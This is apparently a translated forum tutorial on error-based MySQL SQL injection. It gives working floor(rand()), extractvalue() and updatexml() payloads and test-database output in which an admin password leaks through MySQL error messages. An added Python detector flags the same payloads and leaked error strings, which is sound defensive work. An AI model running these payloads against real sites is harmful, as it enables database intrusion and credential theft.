Posting some old notes. When MySQL executes a statement it raises an error message, and PHP+MySQL sites often print that error text straight onto the page, so the three methods below can be used to pull specific data out through the error.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
Payloads such as the following can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version is leaked in the error message. To retrieve other data, replace the version() expression at that position with another query.
For example, to retrieve the admin username and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
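As an added example (not part of the original post), here is a defender-side Python detector for the three primitives above: it flags the floor(rand())+group by, extractvalue() and updatexml() patterns in URL-decoded request query strings, and the two leaked MySQL error strings in response bodies or application logs. The log line format and the sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the three primitives described above.
# The floor() technique needs both pieces, so it is checked as a pair.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(", re.I)
GROUP_BY = re.compile(r"group\s+by", re.I)
XML_FUNCS = {
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}
# Response-side signatures: the exact MySQL errors the post shows being leaked.
LEAK_PATTERNS = {
    "mysql_1062_group_key": re.compile(r"Duplicate entry '.*' for key 'group_key'"),
    "mysql_1105_xpath": re.compile(r"XPATH syntax error: '"),
}

def classify_request(raw_query: str) -> list:
    """Names of error-based primitives present in a URL-encoded query string."""
    q = unquote_plus(raw_query)  # handles %28, '+' and similar encodings
    found = []
    if FLOOR_RAND.search(q) and GROUP_BY.search(q):
        found.append("floor_rand_groupby")
    found += [name for name, pat in XML_FUNCS.items() if pat.search(q)]
    return found

def classify_response(text: str) -> list:
    """Names of leaked MySQL error signatures in a response body or app log line."""
    return [name for name, pat in LEAK_PATTERNS.items() if pat.search(text)]

def scan_log(lines):
    """Lines are assumed to look like 'METHOD /path?query STATUS' (constructed
    format). Returns (line_no, findings) for each line carrying a primitive."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        query = parts[1].partition("?")[2] if len(parts) > 1 else ""
        found = classify_request(query)
        if found:
            hits.append((n, found))
    return hits

# Constructed sample log: one benign request, then the three payloads from the post.
SAMPLE_LOG = [
    "GET /article.php?id=1 200",
    "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),"
    "floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) 500",
    "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) 500",
    "GET /article.php?id=1+and+1=(updatexml(1,concat(0x5e24,(select+user()),0x5e24),1)) 500",
]
```

Calling scan_log(SAMPLE_LOG) returns the line numbers 2, 3 and 4 with the primitive each one carries; classify_response is meant to run over the application's error output so that a leaked error string is caught even when the request side was missed.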
That's all; thanks to the foreign guys.